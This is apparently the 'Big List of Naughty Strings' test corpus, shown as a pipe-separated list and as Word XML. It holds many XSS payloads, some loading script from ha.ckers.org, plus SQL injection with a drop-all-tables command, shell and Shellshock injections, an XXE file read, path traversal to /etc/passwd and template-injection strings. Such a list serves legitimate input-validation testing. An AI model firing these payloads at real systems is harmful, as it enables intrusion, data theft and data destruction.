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"" | '"' | "''''"'" | "'"'"''''" | &lt;foo val=“bar” /&gt; | &lt;foo val=“bar” /&gt; | &lt;foo val=”bar“ /&gt; | &lt;foo val=`bar'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'`"&gt;&lt;\x3Cscript&gt;javascript:alert(32)&lt;/script&gt; | '`"&gt;&lt;\x00script&gt;javascript:alert(33)&lt;/script&gt;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`"'&gt;&lt;img src=xxx:x \x0Aonerror=javascript:alert(118)&gt; | `"'&gt;&lt;img src=xxx:x \x22onerror=javascript:alert(119)&gt; | `"'&gt;&lt;img src=xxx:x \x0Bonerror=javascript:alert(120)&gt; | `"'&gt;&lt;img src=xxx:x \x0Donerror=javascript:alert(121)&gt; | `"'&gt;&lt;img src=xxx:x \x2Fonerror=javascript:alert(122)&gt; | `"'&gt;&lt;img src=xxx:x \x09onerror=javascript:alert(123)&gt; | `"'&gt;&lt;img src=xxx:x \x0Conerror=javascript:alert(124)&gt; | `"'&gt;&lt;img src=xxx:x \x00onerror=javascript:alert(125)&gt; | `"'&gt;&lt;img src=xxx:x \x27onerror=javascript:alert(126)&gt; | `"'&gt;&lt;img src=xxx:x \x20onerror=javascript:alert(127)&gt; | "`'&gt;&lt;script&gt;\x3Bjavascript:alert(128)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x0Djavascript:alert(129)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xEF\xBB\xBFjavascript:alert(130)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x81javascript:alert(131)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x84javascript:alert(132)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE3\x80\x80javascript:alert(133)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x09javascript:alert(134)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x89javascript:alert(135)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x85javascript:alert(136)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x88javascript:alert(137)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x00javascript:alert(138)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\xA8javascript:alert(139)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x8Ajavascript:alert(140)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE1\x9A\x80javascript:alert(141)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x0Cjavascript:alert(142)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x2Bjavascript:alert(143)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xF0\x90\x96\x9Ajavascript:alert(144)&lt;/script&gt; | "`'&gt;&lt;script&gt;-javascript:alert(145)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x0Ajavascript:alert(146)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\xAFjavascript:alert(147)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x7Ejavascript:alert(148)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x87javascript:alert(149)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x81\x9Fjavascript:alert(150)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\xA9javascript:alert(151)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xC2\x85javascript:alert(152)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xEF\xBF\xAEjavascript:alert(153)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x83javascript:alert(154)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x8Bjavascript:alert(155)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xEF\xBF\xBEjavascript:alert(156)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x80javascript:alert(157)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x21javascript:alert(158)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x82javascript:alert(159)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x86javascript:alert(160)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE1\xA0\x8Ejavascript:alert(161)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x0Bjavascript:alert(162)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x20javascript:alert(163)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xC2\xA0javascript:alert(164)&lt;/script&gt;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&lt;img[a][b][c]src[d]=x[e]onerror=[f]"alert(192)"&gt;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src="x` `&lt;script&gt;javascript:alert(200)&lt;/script&gt;"` `&gt; | &lt;img src onerror /" '"= alt=javascript:alert(201)//"&gt; | &lt;title onpropertychange=javascript:alert(202)&gt;&lt;/title&gt;&lt;title title=&gt; | &lt;a href=http://foo.bar/#x=`y&gt;&lt;/a&gt;&lt;img alt="`&gt;&lt;img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"""&gt;&lt;SCRIPT&gt;alert("206")&lt;/SCRIPT&gt;"&gt; | &lt;IMG SRC=javascript:alert(String.fromCharCode(50,48,55))&gt; | &lt;IMG SRC=# onmouseover="alert('208')"&gt; | &lt;IMG SRC= onmouseover="alert('209')"&gt;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'print "&lt;IMG SRC=java\0script:alert(\"218\")&gt;";' &gt; out | &lt;IMG SRC=" &amp;#14;  javascript:alert('219');"&gt; | &lt;SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt; | &lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert("220")&gt;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`touch /tmp/blns.fail` | $(touch /tmp/blns.fail) | @{[system "touch /tmp/blns.fail"]} | eval("puts 'hello world'") | System("ls -al /") | `ls -al /` | Kernel.exec("ls -al /") | Kernel.exit(1) | %x('ls -al /') | &lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;&lt;!DOCTYPE foo [ &lt;!ELEMENT foo ANY &gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd" &gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt; | $HOME | $ENV{'HOME'} | %d | %s%s%s%s%s | {0} | %*.*s | %@ | %n | File:/// | ../../../../../../../../../../../etc/passwd%00 | ../../../../../../../../../../../etc/hosts | () { 0; }; touch /tmp/blns.shellshock1.fail; | () { _; } &gt;_[$($())] { touch /tmp/blns.shellshock2.fail; } | &lt;&lt;&lt; %s(un='%s')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fox... [Beeeep] | Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗 | 🏳0🌈️ | జ్ఞ‌ా | گچپژ | {% print 'x' * 64 * 1024**3 %} | {{ "".__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read()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--1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-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,./;'[]\-=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;&gt;?:"{}|_+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  　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""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">'"'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"''''"'"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"'"'"''''"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;foo val=“bar” /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;foo val=“bar” /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;foo val=”bar“ /&gt;</w:t>
      </w:r>
    </w:p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,。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’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¯\_(ツ)_/¯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>
      <w:r>
        <w:t xml:space="preserve">&lt;script&gt;alert(0)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&amp;lt;script&amp;gt;alert(&amp;#39;1&amp;#39;);&amp;lt;/script&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src=x onerror=alert(2) /&gt;</w:t>
      </w:r>
    </w:p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r>
        <w:t xml:space="preserve">&gt;&lt;script&gt;alert(6)&lt;/script&gt;</w:t>
      </w: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 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--&gt;&lt;script&gt;alert(14)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">";alert(15);t="</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">';alert(16);t='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"&gt;&lt;script&gt;alert(20);&lt;/script x="</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;alert(21);&lt;/script x='</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&gt;&lt;script&gt;alert(22);&lt;/script x=</w:t>
      </w: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&lt;script\x20type="text/javascript"&gt;javascript:alert(25);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;script\x3Etype="text/javascript"&gt;javascript:alert(26);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;script\x0Dtype="text/javascript"&gt;javascript:alert(27);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;script\x09type="text/javascript"&gt;javascript:alert(28);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;script\x0Ctype="text/javascript"&gt;javascript:alert(29);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;script\x2Ftype="text/javascript"&gt;javascript:alert(30);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;script\x0Atype="text/javascript"&gt;javascript:alert(31);&lt;/script&gt;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&lt;img[a][b][c]src[d]=x[e]onerror=[f]"alert(192)"&gt;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src="x` `&lt;script&gt;javascript:alert(200)&lt;/script&gt;"` `&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src onerror /" '"= alt=javascript:alert(201)//"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;title onpropertychange=javascript:alert(202)&gt;&lt;/title&gt;&lt;title title=&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href=http://foo.bar/#x=`y&gt;&lt;/a&gt;&lt;img alt="`&gt;&lt;img src=x:x onerror=javascript:alert(203)&gt;&lt;/a&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;!--[if]&gt;&lt;script&gt;javascript:alert(204)&lt;/script --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;!--[if&lt;img src=x onerror=javascript:alert(205)//]&gt; --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;script src="/\%(jscript)s"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;script src="\\%(jscript)s"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;IMG """&gt;&lt;SCRIPT&gt;alert("206")&lt;/SCRIPT&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;IMG SRC=javascript:alert(String.fromCharCode(50,48,55))&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;IMG SRC=# onmouseover="alert('208')"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;IMG SRC= onmouseover="alert('209')"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;IMG onmouseover="alert('210')"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#50;&amp;#49;&amp;#49;&amp;#39;&amp;#41;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x32&amp;#x31&amp;#x33&amp;#x27&amp;#x29&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;IMG SRC="jav   ascript:alert('214');"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;IMG SRC="jav&amp;#x09;ascript:alert('215');"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;IMG SRC="jav&amp;#x0A;ascript:alert('216');"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;IMG SRC="jav&amp;#x0D;ascript:alert('217');"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">perl -e 'print "&lt;IMG SRC=java\0script:alert(\"218\")&gt;";' &gt; out</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;IMG SRC=" &amp;#14;  javascript:alert('219');"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert("220")&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;SCRIPT/SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;&lt;SCRIPT&gt;alert("221");//&lt;&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&lt; B &gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;IMG SRC="javascript:alert('222')"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">\";alert('223');//</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;u oncopy=alert()&gt; Copy me&lt;/u&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;i onwheel=alert(224)&gt; Scroll over me &lt;/i&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;plaintext&gt;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users-- 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">' OR 1=1 -- 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">' OR '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">'; EXEC sp_MSForEachTable 'DROP TABLE ?'; --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">%</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">_</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">--version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">--help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t xml:space="preserve">`touch /tmp/blns.fail`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">$(touch /tmp/blns.fail)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">@{[system "touch /tmp/blns.fail"]}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">eval("puts 'hello world'")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">System("ls -al /")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">`ls -al /`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&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;&lt;!DOCTYPE foo [ &lt;!ELEMENT foo ANY &gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd" &gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">$HOME</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">$ENV{'HOME'}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_; } &gt;_[$($())]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r>
        <w:t xml:space="preserve">http://www.cum.qc.ca/</w:t>
      </w:r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fox...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'x' * 64 * 1024**3 %}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">{{ "".__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read()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